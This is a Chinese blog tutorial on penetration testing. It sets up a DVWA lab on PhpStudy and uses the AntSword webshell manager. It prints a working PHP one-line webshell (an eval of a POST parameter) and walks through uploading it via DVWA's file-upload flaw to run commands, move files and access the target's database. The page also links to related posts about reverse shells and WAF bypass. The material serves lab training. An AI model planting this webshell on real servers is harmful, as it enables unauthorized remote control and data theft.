渗透测试环境搭建与工具“中国蚁剑”的使用

最新推荐文章于 2024-04-29 10:59:53 发布
最新推荐文章于 2024-04-29 10:59:53 发布
阅读量5.9k 收藏 35
点赞数 7
分类专栏: 网络渗透 文章标签: web安全 安全 网络 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63286108/article/details/125321641
版权

此资料仅供学习参考,请勿用于非法用途,违者一律承担所有风险

操作机: Windows 10 (安装中国蚁剑)
靶机: Windows 10(安装PhpStudy DVWA,关闭防火墙)ip:192.168.31.131

下载安装包

中国蚁剑:https://pan.baidu.com/s/1V1lvTrArX6lv62Azcegt5w
PhpStudy:https://pan.baidu.com/s/1mW33EQ1MTqU32CQ0LTBlwQ
DVWA:https://pan.baidu.com/s/1We5nieSDi0vQ4aASxsK6Fw

提取码:co6e

实验原理

(1)关于Webshell
Webshell是以ASP、PHP、JSP或者CGI等网页文件形式存在的一种代码执行环境,主要用于网站管理、服务器管理、权限管理等操作。
Webshell使用方法简单,只需上传一个代码文件,通过网址访问,便可进行很多日常操作,极大地方便了使用者对网站和服务器的管理。正因如此,也有小部分人将代码修改后当作后门程序使用,以达到控制网站服务器的目的。

(2)关于中国蚁剑
蚁剑是一个开放源代码、跨平台的Webshell管理工具,旨在满足渗透测试人员以及具有权限和/或授权的安全研究人员以及网站管理员的需求。

实验步骤

1、搭建渗透环境
将PhpStudy、DVWA下载到靶机并解压到相应位置,这里我都解压到桌面

双击PhpStudy2018.exe文件,我选择安装在C盘在这里插入图片描述

等待自解压完成
在这里插入图片描述

PhpStudt已经安装完成
在这里插入图片描述

点击其他选项菜单,先退出PhpStudy
在这里插入图片描述

双击解压后的DVWA文件夹,把里面的DVWA-master文件夹剪贴在安装PhpStudy文件夹下的PHPTutorial/WWW里
在这里插入图片描述

进入DVWA-master/config,把config.inc.php.dist文件改为config.inc.php(删除.dist后缀)然后右键以记事本方式打开此文件
在这里插入图片描述

将config.inc.php文件中MySQL数据库的连接用户名由“dvwa”修改为“root”、密码由“p@ssw0rd”修改为“root”,保存并退出
在这里插入图片描述

接下来启动PhpStudy,双击然后点击启动
在这里插入图片描述
在这里插入图片描述

测试一下环境是否搭建成功,在浏览器中输入http://本地ip/DVWA-master
在这里插入图片描述这样渗透环境已经搭建成功

2、写PHP一句话木马(Webshell)
在操作机桌面新建一个文本文档并更名为muma.php
在这里插入图片描述
在这里插入图片描述

鼠标右键单击muma.php,以记事本的方式打开,在文件中输入以下代码并保存:

<?php @eval($_POST['123456']); ?>

在这里插入图片描述

3、利用靶机的文件上传漏洞,将此木马文件(Webshell)上传至靶机

(1)在操作机上启动浏览器,在地址栏中输入以下URL访问靶机上的DVWA网站(如不是登录界面,滑至页面底端,点击Create/Reset Database按钮)

http://[靶机IP]/DVWA-master

在这里插入图片描述
在这里插入图片描述

(2)成功登录DVWA网站后,在网站主页左侧菜单选择DVWA Security,将网站的安全级别设置为“Low”

在这里插入图片描述

(3)在DVWA网站主页左侧菜单选择“File upload”进入文件上传训练关卡,将muma.php上传至靶机,并记下文件上传的路径
在这里插入图片描述

4、利用“中国蚁剑”连接靶机上的muma.php
(1)在操作机上把下载好的蚁剑安装包解压在桌面,进入桌面文件夹AntSword/AntSword-Loader-v4.0.3-win32-x64,鼠标左键双击“AntSword.exe”程序,运行“中国蚁剑”
在这里插入图片描述
在这里插入图片描述

初次运行“中国蚁剑”时,需要初始化。点击“中国蚁剑”主界面的“初始化”按钮,将桌面AntSword/antSword-master指定为“中国蚁剑”的工作目录
在这里插入图片描述

指定完成后,界面会提示手动重启蚁剑程序。可再次进入桌面文件夹/AntSword/AntSword-Loader-v4.0.3-win32-x64,运行“AntSword.exe”程序
在这里插入图片描述

(2)在“中国蚁剑”主界面空白处单击鼠标右键,在弹出的菜单中选择“添加数据”
在这里插入图片描述

添加一条Webshell管理项:

URL地址:http://[靶机IP]/DVWA-master/hackable/uploads/muma.php
连接密码:123456
连接类型:PHP

在这里插入图片描述

设置完成后点击左上角的“添加”按钮,会看到主界面多了一条Webshell管理项
在这里插入图片描述

5、利用“中国蚁剑”对靶机进行虚拟终端及文件操作
(1)虚拟终端操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“虚拟终端”
在这里插入图片描述
打开虚拟终端界面后,可以像操作本地机器一样,对靶机执行一些操作系统命令(如whoami、id、netstat -an等)
在这里插入图片描述

(2)文件操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“文件管理”
在这里插入图片描述
在这里插入图片描述

打开文件管理界面后,可以像操作本地机器一样,对靶机系统进行一些操作(如上传文件、下载文件、修改文件属性等)
在这里插入图片描述

(3)数据操作
选中muma.php所在的Webshell管理项,单击鼠标右键,在弹出的菜单中选择“数据操作”
在这里插入图片描述

打开文件管理界面后,可以对靶机上的数据库系统进行一些操作
在这里插入图片描述实验到此结束。

Kicock.
关注
  • 7
    点赞
  • 35
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
中国蚁剑使用
m0_49506405的博客
01-17 593
1.在win7上phpstudy网站上,上传一句话木马 一句话木马 修改文件名为 .php 后缀 上传1.php 2.在操作机上利用中国蚁剑链接靶机上的1.php 在空白部分右键添加数据 点击添加 登录成功
中国蚁剑(AntSword)安装、使用教程
热门推荐
凝聚力安全团队
08-24 9万+
项目地址 加载器: https://github.com/eastmountyxz/AntSword-Experiment/ 项目核心源码: https://github.com/yuyuko233/AntSword 如果从github上下载很卡,可以去复制链接到githubd上下载 https://githubd.com 安装教程 我使用的渗透机为windows10,下载好会包含两个文件: 使用教程 插件安装 ...
中国蚁剑(antSword)下载、安装、使用教程
qq_46603839的博客
04-29 1381
antsword
【蚁剑工具-01】网站管理工具中国蚁剑安装过程详解以及应用实例
m0_64378913的博客
06-18 6850
目录1 中国蚁剑安装及设置1.1 下载1.2 安装1.3 相关设置2 中国蚁剑应用实例2.1 操作环境2.2 具体步骤2.3 思考3 总结参考文章 任何人不得将其用于非法用途以及盈利等目的,也禁止未经允许私自修改打包进行发布,否则后果自行承担并将追究其相关责任! 中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。 1 中国蚁剑安装及设置 安装位置:win10真实机 1.1 下载 (1)下载蚁剑加载器。在蚁剑官方github下载,网址为https://
中国蚁剑安装和使用教程(GOOD)
weixin_74245209的博客
11-30 2006
可以看到这是最高权限system相当于Linux中的root。官方加载器:(加载器分为Mac、Windows、Linux)在运行AntSword .exe。里面有一些好用的插件,大家自己去看。蚁剑的大名想必各位都听过今天来安装配置。可以上传,修改或删除。可以右键建个快捷方式。添加webshell地址和密码。2.添加webshell。第一个箭头单点进入终端。
中国蚁剑安装使用教程
Karka_的博客
03-21 1817
中国蚁剑是一款开源的跨平台网站管理工具,它主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。如上主要包括蚁剑的下载,连接一句话木马,更改木马连接参数,绕过WAF。
webshell工具——蚁剑】蚁剑安装使用教程
SUSUYUA的博客
02-06 1万+
本篇内容主要为webshell工具蚁剑的安装以及使用,本人也通过查询较多的文章,进行了总结,由于是第一次接触,有些地方可能存在问题,欢迎评论区留言。
网络安全渗透测试工具导航目录大全
02-21
一些网络安全渗透测试工具导航,值得收藏!
渗透测试工具使用(PDF课件资料)
最新发布
05-30
使用3proxy进行内网穿透.pdf 使用admsnmp进行snmp分析.pdf 使用amap进行服务枚举.pdf 使用arping进行目标机器识别.pdf 使用arpspoof进行arp欺骗.pdf 使用autoscan进行端口扫描.pdf 使用dsniff进行网络嗅探.pdf 使用...
渗透测试,靶场,模拟搭建渗透测试真实环境,搭建靶场详细流程即相关包.zip
12-05
内容:详细的渗透测试靶场搭建包,以及详细搭建流程,提供了靶场所有环境,比如sql注入,...适用于:需要学习渗透测试相关知识,但是没有搭建好模拟真实环境的靶场人群下载以及使用,同时针对小白可以评论沟通交流;
蚁剑源码包+蚁剑加载器
08-20
蚁剑源码包+蚁剑加载器 “antSword-master.zip”,用于离线安装中国蚁剑
As-Exploits:中国蚁剑后渗透框架
04-06
漏洞利用v 1.2 中国蚁剑后渗透框架 详细介绍:http: 支持类型:php / jsp / aspx 有效载荷部分很多很多了了跟的实现,向其开发者们表示感谢! 支持列表 模块名称\ Shell类型 PHP ASPX JSP 基本信息 √ √ √ 反弹壳 √ √ √ 内存马 √ 内存马管理 √ 杀软识别 √ √ √ 提权辅助 √ √ √ 屏幕截图 √ √ ShellCode加载器 √ 罐装器 √ 模块介绍 基本信息 获取当前服务端信息。 支持类型:php / jsp / aspx PHP jsp aspx 反弹壳 跟MSF联动 支持类型:php / jsp / aspx 有效负载目前支持以下类型: java / meterpreter / reverse_tcp java / shell / reverse_tcp java / meterpr
中国蚁剑使用教程.zip
12-12
中国蚁剑使用教程.zip 中国蚁剑采用了Electron作为外壳,ES6作为前端代码编写语言 利用js调用shell执行XSS代码
cracer纪念版渗透测试工具
05-07
cracer纪念版渗透测试工具
网络安全——Webshell管理工具
weixin_54055099的博客
08-21 4381
Webshell的应用,中国菜刀、蚁剑、weevely、御剑、Havij的使用
关于蚁剑的安装和使用
hanjunhao2002的博客
02-02 1248
加载器: https://github.com/AntSwordProject/AntSword-Loader 核心源码: https://github.com/AntSwordProject/antSword 两者都下好之后运行exe文件 发现需要初始化,进行初始化,路径为你下载的源码路径 初始化成功后如下 将小马上传服务器后url地址填写小马的位置 后面两者都选base64 连接密码为小马里面默认的123 添加后连接成功如下 可以轻松控制权限
中国蚁剑-antSword
lin__ying的博客
12-28 1105
蚁剑是一款开源的跨平台Webshell管理工具,它是一个开源的远程管理工具,主要面向于合法授权的渗透测试安全人员以及进行常规操作的网站管理员。蚁剑提供了一个图形化界面,可以通过简单的操作连接和控制目标设备或系统。蚁剑具有以下特点:1.支持多种操作系统:蚁剑支持多种操作系统,包括Windows、Linux、MacOS等,因此具有很好的跨平台性能。2.功能丰富:蚁剑具有文件管理器、进程管理器、主机信息查看器、端口转发等多种功能,为用户提供了全面的远程管理服务。
蚁剑连接一句话木马
m0_64417923的博客
05-18 8092
一,在服务器上安装phpstudy 二,安装成功后启动apache 三,打开网站,看看是否成功 四,在攻击端安装菜刀 安装好后尝试用浏览器进入服务器搭建的网站(必须先设置好桥接) 输入服务器ip即可 cmd输入:ipconfig 正常情况下需要通过网站的漏洞,将一句话木马上传到网站上, 五,将一句话木马复制到网站 不过这次只是测试学习如何使用一句话木马的,所以直接将一句话木马复制到网站中: 创建一个文本,写入 <?php eval($_REQUEST[123..
中国蚁剑简介
m0_73721944的博客
03-28 1497
一句话木马:在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此。中国蚁剑和中国菜刀类似,是一款webshell终端管理工具,主要面向合法授权的渗透测试安全人员及常规操作的管理员。(1)php的代码要写在
kali渗透测试环境搭建结论
04-21
Kali Linux是一种专门用于渗透测试网络安全的操作系统。它集成了大量的渗透测试工具和资源,方便安全专业人员进行各种安全评估和渗透测试任务。 要搭建Kali渗透测试环境,可以按照以下步骤进行: 1. 下载Kali Linux镜像:从Kali官方网站下载最新版本的Kali Linux镜像文件。 2. 创建虚拟机或准备物理机:使用虚拟化软件(如VirtualBox、VMware)创建一个虚拟机,或者准备一台物理机来安装Kali Linux。 3. 安装Kali Linux:将Kali Linux镜像文件挂载到虚拟机或物理机上,并按照安装向导进行安装。 4. 更新系统:安装完成后,使用以下命令更新系统软件包: ``` sudo apt update sudo apt upgrade ``` 5. 安装渗透测试工具:Kali Linux已经预装了许多常用的渗透测试工具,但你也可以根据需要自行安装其他工具。例如,使用以下命令安装Metasploit框架: ``` sudo apt install metasploit-framework ``` 6. 学习和实践:渗透测试是一项复杂的任务,需要深入的知识和实践经验。建议你学习相关的网络安全知识和渗透测试技术,并在合法授权的环境下进行实践。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kicock.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值